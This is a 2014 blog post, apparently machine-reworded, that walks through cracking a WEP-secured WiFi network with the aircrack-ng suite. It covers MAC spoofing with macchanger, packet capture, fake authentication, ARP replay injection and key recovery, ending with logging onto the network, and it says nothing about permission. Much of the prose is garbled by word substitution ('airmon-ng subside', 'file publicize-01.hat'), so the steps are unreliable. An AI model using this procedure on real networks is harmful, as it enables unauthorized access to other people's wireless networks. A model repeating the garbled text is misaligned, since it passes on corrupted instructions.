Tuesday 28 October 2014

WiFi Hacking

This tutorial will mosey you through a step by step procedure to crack WEP secured wireless network. It is in fact easy to crack WEP. So now lets acquire it started :
Step 1 -
Open Konsole,The backtrack terminal.
Step 2 -
Run the following commands to acquire a list of your network interfaces:
airmon-ng
Step 3 -
The one I've got there is labeled "ra0". Yours MAYBE DIFFERENT; post yes note of the label and write it the length of. From here in version to in, SUBSTITUTE it in everywhere a command includes (interface).
Step 4 -
Run the in the middle of four commands :
airmon-ng subside (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng begin (interface)
(interface) is the network adapter pronounce.

Step 6 -
Now the ethical hacking starts,pick your network by meting out this command :
airodump-ng (interface)

Step 7 -
The above command will display a list of within be in wireless bad skin muggy you,pick the spot you bearing in mind,and concur note of two things: its BSSID and its channel (in the column labeled CH).NOTE : this bitterness will by yourself doing-fighting if the network has WEP encryption,for that,see the WEP encryption (in the ENC) column, not WPA or everything else.
Step 8 -
Now we will TRY to seizure what is transmitting upon that network and combined it in a file,Use these commands for that :
airodump-ng -c (channel) -w (file make known) --bssid (bssid) (interface)
fine-flavor the required fields.
Step 9 -
Now consent to the technology get sticking together of its skirmish out,minimize the konsole,subsequently realize into a auxiliary konsole window.Issue these commands in NEW konsole :
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Here the ESSID is the access reduction's proclaim, which in my deed is HornyBitch. What you lack to acquire after this command is the reassuring "Association proficiently-off" notice when that smiley direction.
Step 10 -
You are now 70% Done,Now matter the commands :
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
These commands will make the router traffic to capture more throughput faster to eagerness going on our crack. After a few minutes, that stomach window will begin going insane following relationships/write packets.
Step 11 -
Now we will use the patience part,Basically we nonattendance to wait until sufficient data has been collected to control your suspension. Watch the number in the "#Data" columnwe nonappearance it to go above 10,000.
Step 12 -
Once you've collected enough data, it's the moment of resolved. Launch a third Konsole window and counsel the bearing in mind to crack that data you've collected:
aircrack-ng -b (bssid) (file publicize-01.hat)
NOTE : THE (filename -01) is the publicize of MY file,regulate it and put the state of YOUR FILE.
Step 13 -

If you didn't profit plenty data, aircrack will fail and add footnotes to you to aspiration again gone more.
The WEP key appears adjoining "KEY FOUND." Drop the colons and enter it to log onto the network.


No comments:

Post a Comment

Prevention Techniques: Cross-site request forgery (CSRF)

1. The best defense against CSRF attacks is unpredictable tokens, a piece of data that the server can use to validate the request, and wh...